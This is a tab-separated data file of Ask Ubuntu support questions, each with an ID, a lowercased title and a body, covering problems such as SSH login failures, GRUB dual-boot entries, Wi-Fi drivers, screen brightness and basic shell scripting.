366729	ca n't ssh to instance	i have a linode instance , i was successfully connecting to it via ssh . but i 've decided to rebuild my instance and then i can not connect to that instance via ssh . the linode works correctly because i can get access via lish ( lonode ssh ) i 've tried to clear known_hosts with : ssh-keygen -r 212.71.xxx.xx but i still getting message : ssh root @ 212.71.xxx.xx -v openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to 212.71.238.74 [ 212.71.238.74 ] port 22. debug1 : connection established . debug1 : identity file /home/megas/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/megas/.ssh/id_rsa-cert type -1 debug1 : identity file /home/megas/.ssh/id_dsa type -1 debug1 : identity file /home/megas/.ssh/id_dsa-cert type -1 debug1 : identity file /home/megas/.ssh/id_ecdsa type -1 debug1 : identity file /home/megas/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa c5 : c3 : a7 : c0:5a:25 : a1:64 : c4:04:0c:42 : bb:46 : f6:96 debug1 : host '212.71.238.74 ' is known and matches the ecdsa host key . debug1 : found key in /home/megas/.ssh/known_hosts:1 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/megas/.ssh/id_rsa debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/megas/.ssh/id_dsa debug1 : trying private key : /home/megas/.ssh/id_ecdsa debug1 : no more authentication methods to try . permission denied ( publickey , password ) . how to resolve this problem ? thanks
366730	can not open steam after uprade to 13.10	i have download and install steam successfully when using ubuntu 13.04 . recently , i upgrade my system to 13.10 , and i found that i can not open steam anymore . the program just display nothing and then quit . anyone have idea about how to install steam on ubuntu 13.10 please ?
366731	ubuntu tunnel or gateway	i have three different server based on ubuntu 12.4 . the main idea to route specific traffic through one server . server a - 144.50.1.25 ; server b - 144.55.23.21 ; server c - 144.10.12.34 ; how to create tunnel which route all traffic from server a to server c through server b. a- > b- > c i 've tried to setup route but it does n't help me : on server a : route add -host 144.10.12.34 gw 144.55.23.21 eth0 siocaddrt : network is unreachable
366736	steam repository help ?	steam runs fine in raring , not ready for saucy for another few months , in the meantime this repo is 404ing me every time i do an `` apt-get update '' http : //ppa.launchpad.net/ubuntu-xswat/x-updates/ubuntu raring this ppa is supposed to allow me to get the latest updates for my intel graphics card . i tried searching the net to no avail but does someone know the correct ppa for this ? any help is appreciated , thanks !
366737	why is my pc so slow ?	i recently changed my os to ubuntu from xp via usb because the cd-drive is not very reliable due to the old age of the pc . but still my system requirements are enough to operate ubuntu . 1.5 gb of ram , intel pentium 4 cpu 2.26 ghz with nvidia fx 5200 . if you need any more details please ask .
366739	ubuntu one shared folders	i am new in this place . actually somebody shared some folders with me using ubuntu one . i can see those files but can not download . now i dont know where to find those files in this site . please help me . i am not able to find the shared folders + do n't have idea how to download them on my pc .
366741	how to boot windows xp directly via grub2 if windows 7 has been installed ?	i 've been dual booting between ubuntu and windows xp . i recently installed windows 7 in a spare partition , and now the only the entries i get in grub are ubuntu and windows 7 . after selecting windows 7 , i can still select `` older version of windows '' , but i 'd prefer to boot into windows xp directly , that used to be the default . it looks like windows 7 has installed its own boot loader into the windows xp partition - is there any way to still boot windows xp directly from grub ?
366742	how to share the files from host to guest in virtual box ? host-ubunutu/guest-ubuntu	i have an ubuntu 12.04 machine on which i have installed virtualbox with ubuntu 12.04 as the guest os . how can i share files between the host and guest ? i have installed the guest additions also but still its not able to mount the sf_shared folders , if even its mounted . this means i 'm unable to retrieve the file from the host . can tell me how to do it .
366744	how do i type in a file path ?	how do i type in a file path in ubuntu 's default file explorer ? by the looks of it , i can only drill down into folders by clicking on folder icons .
366745	epson stylus sx235w with ubuntu 12.04 - scanner not recognised	i 'm setting up a new computer running ubuntu 12.04 and am having trouble getting the scanner on my epson stylus sx235w all-in-one to be recognised . i would like to be able to use the 'image scan ! for linux ' program . the device is connected via usb . i installed the relevant .deb files from the epson download center for image scan ! , namely iscan-data_1.24.0-2_all.deb iscan_2.29.2-1-usb0.1ltdl7_i386.deb and installed them in that order , but the program would n't load . an internet search suggested downloading the libsane-extras package and editing the /etc/sane.d/dll.conf file so that the relevant driver was uncommented in the list , which i did but to no effect . i tried uncommenting the following lines epson epson2 i also tried to force libsane to use the scanner by adding the number obtained from a 'lsusb ' terminal command ( bus 003 device 012 : id 04b8:0885 seiko epson corp ) in this form usb 0x04b8 0x0885 to the epson.conf file but nothing happened . beyond this i do n't really know what i 'm doing so any help would be greatly appreciated . thanks very much .
366749	enable disk encryption after installation	i 'm running 13.10 saucy . if i did n't enable disk encryption during installation , is there any way to enable it post facto ? i found this , which says that encryption has to happen at install time , but it 's also referring to fedora . i can easily boot into a live disk if there 's any way to do it from there .
366750	porting an installed partition of ubuntu on a usb stick for the road	i wanted to know if anybody knows of a way to `` take away '' on a bootable usb key my own installed partition from my laptop ( currently 13.04 ) for use on the road . the goal is to have my own fully configured and highly securized environment `` on the go '' and be able to use it in internet cafăšs ( highly insecure environments ) by booting my very own system through the usb stick instead of the stock windows os internet cafăšs usually have . i have already invertigated several solutions but all were ackward and unnervingly slow ... for example using a live-usb with a stock ubuntu install image and persistent option enabled , is incredibly slow at startup ; as it seems to have to `` reinstall '' everything saved in the persistent memory space atop the original os image at boot-up ... for the complicated environment i have , this is not an option because hundreds of programs and security updates have to reinstall themselves each time at boot up ... this takes forever . so , is n't there a way to just sort of copy a working and configured partition on the key and have it boot externally onto any computer allowing it via usb ?
366753	ubuntu 12.04.3 alongside windows 8.1	i brought a new notebook which has pre-installed windows 8.1 with an uefi* ( -bios ) and secure boot* . ( * can switch or turn so off , still no success ) when i try to install ubuntu 12.04.3 , the installer does n't recognize windows 8.1 . there were options , to delete the whole disk or do something else . the second option , shows a few partitions ( ntfs ) but no windows . the ubuntu 13.10 version even did start on my notebook , it gets frozen during start up . ( i thought . maybe the newer one will recognize windows . ) i 'm not very confident in manipulating grub , i hope there is an easy way or an easy description . gparted shows : device type size used /dev/sda freespace 1mb /dev/sda ntfs 1073mb 408mb /dev/sda2 efi 104mb 52mb /dev/sda3 ntfs 134mb 45mb /dev/sda4 ntfs 988465mb 23947mb /dev/sda5 ntfs 10424mb 9483mb free space 0mb /dev/sdb1 fat32 16929mb 9412mb ( usb-drive ubuntu-image )
366754	the cpu has been disabled by the guest operating system . you will need to power off or reset the virtual machine at this point	i have recently downloaded ubuntu 12.04 lts ( 32 bit ) iso image and trying to install it under vmware workstation 9.0. which is under windows 7 ( 64 bit ) . when i start installation it says : the cpu has been disabled by the guest operating system . you will need to power off or reset the virtual machine at this point . does anyone here help me out to install this ?
366755	openfire/redmine service autostart	we are using openfire chat service in the office on a ubuntu server . everyday i have to enter a command to start it . the command line is sudo su - service openfire start . i also start the redmine service using this command ./ctlscript.sh start in the redmine directory . can we make these services autostart during boot ?
366758	grub can not boot windows 7 loader entry on 3tb drive	it fails and it says ' can not find device ' . it will work again if i reinstall windows , and use something like easybcd . but i 'd like grub as a loader only , can someone help me out here ? my system has a regular bios ( p35-ds4 mainboard ) so no uefi support . previously ran windows 8 alongside ubuntu 13.04 , now wanted windows 7 again with ubuntu 13.10 . i am using disk /dev/sda . 3000.6 gb , 3000591900160 bytes 255 head , 63 sectors/track , 364801 cylinders , 5860531055 sectors sector size ( logical/fysical ) : 512 bytes / 4096 bytes device begin end blocks id system /dev/sda1 2048 419432447 209715200 83 linux /dev/sda2 419432448 436013055 8290304 82 linux swap /dev/sda3 436015102 1576339455 570162177 5 extended partition 3 does not start on a fysical sector limit . /dev/sda4 * 1576339456 5860530175 2142095360 7 hpfs/ntfs/exfat /dev/sda5 436015104 855443455 209714176 7 hpfs/ntfs/exfat /dev/sda6 855445504 1576339455 360446976 7 hpfs/ntfs/exfat
366760	how to reinstall wifi driver in ubuntu 12.04	i try to install rt3290 driver , but failure . after this wifi connection is disappeared . how can i reinstall default wifi drivers ? i use ralink rt3290 . upd before i have a default driver from ubuntu 12.04 installer . standard driver have bad signal . i installed this package from ubuntu user and signal was better but i have often kernel panic so i delete them by next comnmand sudo dpkg -r rt3290-dkms .
366762	hp envy 4 - dual win 8 with ubuntu	i have win8 on my envy 4 ullttrabook and i want to dual win8 with ubuntu . i download the instulation and run it throw usb . but , the installision does not recognize my hard disc , while im in it , throw the usb . whay should i do ?
366763	windows 7 disappeared in list of grub while loading	installed ubuntu 12.04 alongside the windows 7 two weeks ago . initially have n't any issues with that . day ago installed updates on ubuntu and after restarting the system found the absence of win7 in grub list . before the hdd has been partitioned on two volumes disk c and work disk ( do n't remember the name ) . when doing the fdisk -l : sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xa93031e0 device boot start end blocks id system /dev/sda1 * 2048 408833842 204415897+ 7 hpfs/ntfs/exfat /dev/sda2 488386560 976773119 244193280 7 hpfs/ntfs/exfat /dev/sda3 408834046 488386559 39776257 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 408834048 484421631 37793792 83 linux /dev/sda6 484423680 488386559 1981440 82 linux swap / solaris partition table entries are not in disk order disk /dev/mmcblk0 : 3965 mb , 3965190144 bytes 49 heads , 48 sectors/track , 3292 cylinders , total 7744512 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mmcblk0p1 8192 7744511 3868160 b w95 fat32 when sudo mount /dev/sda ~/1 -o offset [ 488386560*512 ] - opens and mounts work disk . need help : how to see and mount disk c. how to see and adjust the grub to appear both systems in grub menu when loading ?
366768	can not establish wifi on ubuntu 12.10 installed using wubi.exe	wifi is not detected .broadcom b43 driver is there but when i try to enable it , it is asking for authentication key password which i dont know . i am very new to ubuntu , please help .
366770	nautilus wo n't accept password in command	hi i 'm trying to connect to ftp using nautilus . but it does n't accept the password . an example how i tried to connect : nautilus ftp : //username : password @ example.com sftp also does n't work . it treats the username and password as username . in the example is asks for a password for user username : password am i doing something wrong ? i found the syntax here
366774	ubuntu 13.10 with cinnamon desktop environment	i did a fresh install of ubuntu 13.10 and added the cinnamon desktop environment and i noticed that the restart and shutdown buttons are missing ! only suspend and cancel are there . in ubuntu 13.04 with the cinnamon desktop environment , everything is there and works ! why are the restart and shutdown buttons showing in 13.04 but not 13.10 ? ? ?
366778	what the meaning of package version number with word 'really ' in the middle ?	command apt-cache show postgresql will listed this information in my machine ( saucy salamander 13.10 ) : $ apt-cache show postgresql package : postgresql priority : optional section : database installed-size : 69 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : debian postgresql maintainers < pkg-postgresql-public @ lists.alioth.debian.org > architecture : all source : postgresql-common ( 148 ) version : 9.3+146really9.1+148 depends : postgresql-9.1 it says postgresql package version 9.3+146really9.1+148 . what the meaning of really here ? is this version 9.1 but listed as 9.3 ? or this is version 9.1 with patch back-ported from 9.3 ? or something else ?
366779	error update ubuntu 13.04 to 13.10	when i tried to upgrade ubuntu 13.04 to 13.10 the errors below appeared : reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //archive.canonical.com raring release : the following signatures were invalid : nodata 1 nodata 2** w : failed to fetch http : //archive.canonical.com/ubuntu/dists/raring/release** w : some index files failed to download . they have been ignored , or old ones used instead . ** ubuntu @ ubuntu : ~ $ sudo apt-get dist-upgrade # point of no return reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
366780	linux touch directory command	what does the command 'touch ' when applied to a directory ? dragos @ dragos -- xps-l702x : ~ $ mkdir test dragos @ dragos -- xps-l702x : ~ $ ls -l total 52 drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 desktop drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 documents drwxr-xr-x 2 dragos dragos 4096 oct 26 17:16 downloads -rw-r -- r -- 1 dragos dragos 8445 oct 25 00:35 examples.desktop drwxrwxr-x 3 dragos dragos 4096 oct 25 00:56 facultate drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 music drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 pictures drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 public drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 templates drwxrwxr-x 2 dragos dragos 4096 oct 27 18:08 test drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 videos dragos @ dragos -- xps-l702x : ~ $ touch test dragos @ dragos -- xps-l702x : ~ $ ls -l total 52 drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 desktop drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 documents drwxr-xr-x 2 dragos dragos 4096 oct 26 17:16 downloads -rw-r -- r -- 1 dragos dragos 8445 oct 25 00:35 examples.desktop drwxrwxr-x 3 dragos dragos 4096 oct 25 00:56 facultate drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 music drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 pictures drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 public drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 templates drwxrwxr-x 2 dragos dragos 4096 oct 27 18:08 test drwxr-xr-x 2 dragos dragos 4096 oct 25 00:42 videos
366784	broken desktop when using xrdp	currently , i have xrdp installed , with the following in the .xsession file : gnome-session -- session=ubuntu-2d when i attempt to access the machine via remote desktop from windows , i am able to log in , but am then greeted with the following screen ( note : it looks less dark on my screen , zoom to sort of see how it is supposed to look ) : i have tried to restart , both the service and the machine , to no avail . any ideas on how to fix this ?
366787	absolutely can not format this sd micro card	have been reading and trying to format this sd card ( no , the switch is unlocked ) . i have ubuntu 12.04 , the card is in a hub . the name for the card in my file menu is mot ( if that helps at all ) there is no info i want to save ( would be fine scraping and re-formatting if easier ) , this is the only item on the card it is not mounted , what else ? ? i have been reading and performing any number of tasks , trying to get this card to work . now its ba principle thing . i should perhaps just junk the card ( its only a 4gb sandisk , ,prob about 5-6 bucks anywhere ) here is my terminal readout : christine @ christine-laptop : ~ $ sudo umount /dev/sdb [ sudo ] password for username : umount : /dev/sdb : not mounted username @ username-laptop : ~ $ sudo mkfs.vfat -n 'ubuntu ' -i /dev/sdb mkfs.vfat 3.0.12 ( 29 oct 2011 ) mkfs.vfat : unable to open /dev/sdb : device or resource busy username @ username-laptop : ~ $ sudo dmsetup ls no devices found username @ username-laptop : ~ $ mkdosfs -f 32 -v /dev/sdb mkdosfs 3.0.12 ( 29 oct 2011 ) mkdosfs : unable to open /dev/sdb : device or resource busy username @ username-laptop : ~ $ this all started because i could not write to the card from my laptop . i have tried using gpart and superuser and on and on . i can not even remember everything i have read and tried , nothing works , please , help . thanks for your time . ps , this card was originally in my phone for months before i decided to buy and use a jambox , and therefore needed mobile tunes in a bluetooth device . i have been able to figure out how to put the music i wanted on the phone on the installed micro card so the phone and other cards work fine . when the card is in my phone , ,much easier . but still , i would like to format and use this card .
366800	how to list folder contents in qml ?	i 'm trying to rewrite a part of the notes-app in order to store notes directly in the file system . but i 'd like to be able to list files in a folder , not in order to display them , but to process them in a javascript function .
366802	what 's the application extension ? ( aka .exe , .app , etc . )	i 'm new to ubuntu . what 's the application extension for development reasons ? i know windows is mainly .exe and mac is .dmg or .app . does linux have an unique one ?
366803	backlight brightness issue and usb error message	i have a acer aspire v5-551g with dual graphics amd core a6 . when i change the brightness like i make it maximum low , after a reboot or wake the brightness is full again . i have installed amd 's drivers . at the starting of ubuntu it says something like error usb 6-3 error it stays there for a while on ubuntu 13.10 . -6-3 usb string descriptor read error no usb devices connected at all i think it is because i have usb3.0 please help if you can fix that i will really be thanking you guys .
366805	ubuntu 12.04 power button does n't work anymore	since 3 days my laptop ( acer aspire v5-571g ) ubuntu 12.04 ignores it when i press the power button . i have eperimental changed /etc/acpi/powerbtn.sh in a shutdown script , that works fine , but i want to see the dialogue ( shutdown restart ... )
366808	can not install my dell printer in 13.10	i go to add printer , ubuntu shows my model printer ( dell 520 series ) , but when i select the printer , it says unable to install printer . any ideas ? the printer is a wireless printer and i tried to add address off my network , but still no luck .
366811	how to add email address from email to existing contact	ubuntu 12.04 i have a couple of email accounts but store my contacts on google to sync with my phone . i am trying to setup an email client so it seamlessly integrates with my various email accounts ( yahoo and gmail based ) and take my contacts from google with bidirectional sync . i have tried thunderbird with a google add on and evolution . both appear to work but the contacts integration is suboptimal . if i have an email from someone in my contacts list , i can only add them as a new contact rather than selecting the existing contact and updating it with the extra details . evolution did seem to support this if i happened to type in the exact name of the contact ( you ca n't browse your contacts ) but it crashes when it tries to do it . anyone have any ideas on how to make this work seemlessly ? thanks lee .
366813	disable second , non-existent screen from command line	my laptop adds/enables a vga monitor called vga2 that does n't actually exist every time i reboot , which fiddles with the mouse speed amongst other annoyances . what can i do to either stop it being enabled or automatically disable it on boot ?
366814	ubuntu 13.04 wo n't reboot with additional hard drive attached	i have a fresh dual boot system ( uefi , windows 8.1 and ubuntu 13.04 ) . ubuntu boots fine ( from a ssd on sata port 3 ) . however , once i connect a hard disk ( to sata port 1 ) , ubuntu will boot only once and then will lockup after grub ( blank screen , no messages ) after further reboots . in the first ( working ) boot , the hard disk is recognized and working just fine ( it is formatted as ntfs ) . windows boots without problems with the additional hard disk attached and reports no problems whatsoever . the only way i can get ubuntu to boot again after the first connect is to disable the sata port in the bios . to summarize : harddrive physically detached : both ubuntu and windows boot fine harddrive then connected : both ubuntu and windows boot fine reboot , hardrive connected : ubuntu does not boot , windows boots disable sata1-port : ubuntu boots again enable sata1- port : ubuntu wo n't boot it is very strange . while i can not be absolutly positive that the hard disk is ok , i am pretty sure . is there any chance that i can get some error log out of ubuntu for the last boot attempt . perhaps someone can give me a hint on how to debug this issue ? thanks !
366817	getting ubuntu touch on my phone ( toroplus , galaxy nexus sprint )	i 'm trying to put ubuntu on my phone . when i run the command phablet-flash ubuntu-system -- channel devel -- no-backup in the terminal it says : info : phablet-flash : device detected as toroplus error : phablet-flash : unsupported device , autodetect fails device what do i do ?
366822	ubuntu server 12.04 raid help	so i installed ubuntu server 12.04 on my adata ssd 60 gb , i have to other hdd wd cavier 500gb drives how would i add them to my server to use raid 1 ?
366826	how do i change the pc boot from legacy to efi mode when boot-repair warns me ?	i ran boot-repair and got this warning : the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode . how do i change to efi mode ? is this done in the bios ?
366831	how to partition an encrypted disk	i 've installed ubuntu 13.10 and formatted my whole hdd , and i chose to encrypt the disk and it automatically chose the lvm option ( and put it as a logical partition ) now after ubuntu installed i tried to repartition the disk thru live cd put gpartition gave me it 's an encrypted partition and it ca n't be resized , i want to put the system 's files and the home folder on partition and my private files on another one any help please ?
366833	why wo n't flash plugin upload ?	why wo n't the flash plugin download to my computer ? i uploaded wine but still no success . when i try to download the program , it attempts to load but then comes back saying the download was unsuccessful because there may be additional programs needed to complete the download . it is as if there are additional plugins/ programs i need to install first . thank for your help !
366834	13.10 asus k56cb gets very hot and fan is very noisy	greetings dear ubuntu users , i recently installed ubuntu 13.10 x64 on my asus k56cb notebook . and it has not been a good expierence so far . after one minute , my laptop gets very hot and the fan is going crazy . i think this is because of my laptop having both an intel gpu and a nvidia gpu . i seriously do n't know how to fix this problem . i had no problems on windows 8 with the fan or my laptop getting too hot , but i really do n't want to go back to windows as i like ubuntu much better . i really hope someone can help me solve this problem as it is very irritating to work with al that fan noise and a hot keyboard .
366839	how to modify applications.menu file as root ?	i´m trying to install backtrack on ubuntu ( with unity ) . i´m stuck trying to modify applications.menu file , because it´s readme only . and i can´t change that using the gui because it´s greyed out . how may i make that file read/write from the command line , or access it with gedit as root ?
366842	ca n't control screen brightness on saucy on acer aspire 5755 and acer aspire v3-571g	i ca n't control the screen brightness in ubuntu 13.10 . i tried the way that worked for me on 12.04 , 12.10 and 13.04 : grub_cmdline_linux_default= '' quiet splash '' but it does n't work on 13.10 . my laptop is an acer aspire v3-571g ( it 's similar to acer 5755 ) .
366845	what does this specific command do ? how does it work ?	i just want to know how this command works . mv wordpress/* . my guess is that it moves * meaning all files from wordpress folder to current folder . but still looking for proper answer .
366846	another wifi not working on 13.10	i upgraded to 13.10 but now my laptop wo n't connect to wifi any more . i can see there are plenty of questions and answers around but my biggest problem is that i 've only been using ubuntu for about a month and before that it was all windows and honestly i have no idea what i 'm doing . except to restart , i restarted . i would n't mind going back to 13.4 but i do n't know how to -_- i can connect with a wire ( and stay connected wirelessly for a while after that o.o ) but that 's it . i ... also do n't know how to check what my wireless card is . clearly i should have waited with the upgrade but it 's late for that advice now so , can anyone help ?
366849	13.10 installation interrupted	i used the gui to update from 13.04 , and left it overnight . i came back to a frozen screen with a prompt to replace a repository . i hard-restarted , and now when i start up , i get a prompt , `` system program problem detected '' before the desktop even starts up , and the computer is barely responsive . what to do ?
366856	move trough the webpages with the middle button like in windows os	i want to use the middle click button to navigate through the webpages like the windows os . i 've searched here , and there is a plugin in chrome ( scroll with middle click ) , but i would preffer to enable in the entire os . it 's possible ?
366858	kern.log is empty	i 've been noticing that my computer has been taking alot of time to shutdown . i decided i would look in some log files and see if i could find the culprit . when i checked in kern.log it was completely empty and i found that strange . is this normal and what would cause it if it is n't ?
366862	how to run : apt-get update in order to correct backtrack installation into ubuntu ?	i´ve just downloaded backtrack files in order to install their tools into ubuntu . i´ve opened then the terminal , and typed : sudo bash backtrack-tools but some stuff seems to be outdated , and appeared this message saying : you may want to run apt-get update to correct these problems how may i do that ? should i step myself into the same backtrack folder and type something like sudo apt-get update backtrack-tools ? i can´t belive it´s that simple , maybe instead of backtrack-tools i have to type other stuff ?
366865	reverse-i-search does n't continue	i wanted to use the reverse-i-search as usual by pressing ctrl+r to search my last ssh command . when i tried , i was only able to write `` ss '' but not continue with `` h '' . additionally when i hit ctrl+h again , nothing happens . does anybody have an explanation ? i am using ubuntu 12.04 and in the pasttime this worked fine ( on my other computer with the same os )
366869	problems with espon xp-215 with ubuntu 12.04	i have installed the correct driver for the epson -xp-215 and ubuntu 12.04 . however , it just seems that the printer is not picking it up at all ? ? ? any ideas ?
366870	default gpu after installing ubuntu	what gpu will ubuntu use by default ? if i havent installed drivers for my nvidia card ? ( i have hd4000 and nvidia gt730m )
366871	update java plug-in	chrome and firefox are using java plug-in 1.7.0_25 , which is automatically disabled because it is not a safe version ( i should install plug-in 1.7.2_45 ) . the problem is that it does n't matter what i do , chrome and firefox keep pointing to the wrong version . how should i proceed in order to use the correct plug-in , i really need it to access many important sites .
366872	how to install ubuntu 12.04 on imac g3	i 'm trying to install ubuntu 12.04 on an imac g3 can anyone tell me from step one how to do this ? i would still consider myself a newbie as far as ubuntu goes so the simpler the better
366879	awk -- comparing the value of two variables in two different files	i have two text files a.txt and b.txt . each line of a.txt a.txt 100 222 398 b.txt 1 2 103 2 4 5 1026 74 7 8 209 55 10 11 122 78 what i am looking for is an awk command for doing this : for each line of a search b ; if ( the value of third column in a line of b - the value of the variable in a > 10 ) print that line of b ;
366883	open exe in ubuntu without wine or any other windows compatibility layer	well , i tried to open some exe files with wine , like minecraft team extream . it runed , but it were stucking so much that it made me rememder my grandmoms walk ! can someone please suggest me something , even how to run an exe file without windows/dos/wine because i lost my cd of the that contains windows ? again , please ! ! ! !
366885	hibernate trouble	i am new to the ubuntu system and love it . i recently upgraded my computer to 13.10 . my hibernate seems to no longer function . i tried to re-enable using this /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla [ re-enable hibernate by default ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes it was working before in the previous version of ubuntu . i can only enable hibernate mode through sudo pm-hibernate and even then , i get a system error message when i take it out of hibernation . is there a fix for this or something that i am missing ?
366887	some nice icon themes for ubuntu	last night i was searching for some good looking icon themes availabe for ubuntu , but unfortunately could not find any post which gives a list of themes : ( . from yesterday night i started searching icons themes and installing one by one . so thought to share some of them hope it will help others to get a bunch of them in one post . this is a q & a-style tutorial which will cover : few good icon themes which are used in famous ubuntu type distros and are available in repository . look and feel through pictures . how to easily install ? i also request others to share their experiences of some awesome icon themes . once themes are installed ubuntu-tweak will help to change and manage them , since i could not find another way to change the themes in unity . in xfce ( xubuntu ) it can be changed from appearance . just believe me this post will not be vast . if i 'll remove pictures then it will become small , but it will not look good . please give suggestion to make it small .
366895	how to know the login and password details , my name and computers name after i 'm done installing ubuntu ?	while the setup i 'm asked to type in my name and the computers name , after the os is installed , how can i know it ? ! [ enter image description here ] [ 1 ]
366902	usb flash drives being mounted read-only in 13.10	ever since installing 13.10 ( x64 ) every time i insert a usb flash drive , it mounts as read-only . i tried using three different drives , and they all get mounted read-only . they were working fine on 13.04 and they still work fine in windows , so i 'm sure there is nothing wrong with the usb drive . how can i stop them from mounting as read only and make them writable ?
366909	error : tcl.h not found ( no such file or directory )	i 'm trying to install something using the 'make ' command , however it gives me the fatal error : tcl.h no such file or directory . i 'm new to linux , can anyone help me ?
366910	broadcom wifi nightmare !	first of all ... i 'm a novice with ubuntu/linux . i became increasingly frustrated with windows so installed ubuntu ( 12.04/32 bit ) . however , i 'm having a torrid time trying to get the wifi to work after trying what seems like everything . it 's an hp mini with a broadcom card ( bcm4313 ) . i know there are many threads and bits of advice but either a ) it has n't worked or b ) it 's jargon heavy and i have no idea what anything means . does anyone , in plain english , have any ideas how i can get the wifi to work ?
366913	brightness bug after upgrading ubuntu 13.10	i had ubuntu 12.10 on my pc , and i did the upgrade to ubuntu 13.10 . but now i have a problem with brightness control , it is always on maximum level and i ca n't set it neither with fn nor with brightness control in the system settings nor with xbacklight or other method . i had tried changing grub_cmdline_linux_default value , but nothing happens . how can i fix this problem ? i have ubuntu 13.10 64bit , kernel 3.11.0-13 , on a toshiba portege r930 , processor : intel® core™ i7-3520m cpu @ 2.90ghz × 4 ; graphic : intel® ivybridge mobile
366915	flashplayer 11.1 on ubuntu 12.04	i am new to ubuntu and i 've visited pretty much every webpage that exists on the internet about how to install canonical flashplayers . ubuntu 12.04 comes with adobe flashplayer 11.2 but that is not the most recent version and adobe no longer supports ubuntu apparently . i have no idea how to install flashplayer 11.1 via terminal . i was able to find a site with canonicals ( https : //launchpad.net/ubuntu/+source/flashplugin-nonfree ) but i have no clue where to go from there , though i 've tried for approx . 4 hours to figure it out on my own . i am hoping someone could take me step by step through the exact code . for example , `` download , then install file '' is not specific enough since i am completely new to this . please help !
366916	how to install an binary and execute it from other folders 12.10	i downloaded the jq json processing library from http : //stedolan.github.io/jq/download/ and ran ./jq and it seems to work great . how do i `` install '' it into my ubuntu 12.10 so it runs from other directories ? this question is so basic that it 's actually very difficult to search . however , i do not know which word for search for in google or where in the ubuntu docs this might be .
366917	how can i get the built-in display to pan as i move the mouse to the edges in dual display mode ?	i have an eeepc 900a with a display of 1024x600 running lubuntu 13.10 . the vga port will display at 1920x1080 . i am able to use lxrandr 0.1.2 to set it to use both displays at the same time . how can i get the built-in display to pan as i move the mouse to the edges ? command line solution is : xrandr -- output lvds1 -- panning 1920x1080 -- output vga1 -- mode 1920x1080
366918	while loop help in shell script	i am new to shell scripting so i am curious about using while loops in shell script form . i know how to declare a variable and use a while loop in java int num = 0 ; while ( num < = 10 ) { system.out.println ( num ) num = num + 1 } but i do n't know how to declare variables and use them in a while loop in a shell script .
366919	ubuntu opera works only with root rigths	opera does n't start if i do n't start it with sudo opera . which can be the problem ? ? ?
366925	can i upgrade unity	since the bug described here i am moving lts distros only , however the current lts is 12.04 , and i`ve seen how ubuntu 13.10 looks like , i know that the unity interface is a wop but , i wan na know is there any possible way to upgrade unity in 12.04 ? and btw , after that wipeout , from the post i was reffering to , that sam stupid ( to be polite ) thing did windows xp , but now i have shortenned the 500gb ntfs partition to 100 gb and added a 100gb ubuntu partition ( for / ) and a 200+ gb partition for /home and installed ubuntu 12.04 like that ( in `` something else '' ) . and after a few minor grub issues everything works perfectly , just like it should be
366926	is upstart a solid replacement for anacron yet ?	upstart faq says : will upstart replace cron , atd or anacron ? yes . a planned feature for upstart is the ability to generate events at a particular scheduled time , regular scheduled time or particular timed intervals . however , the bottom of the page says it was written in 2009 . are these planned features in place yet , and is in practical to use upstart instead of anacron ? also , can upstart handle per-user tasks out of the box ( unlike anacron , for instance ) ?
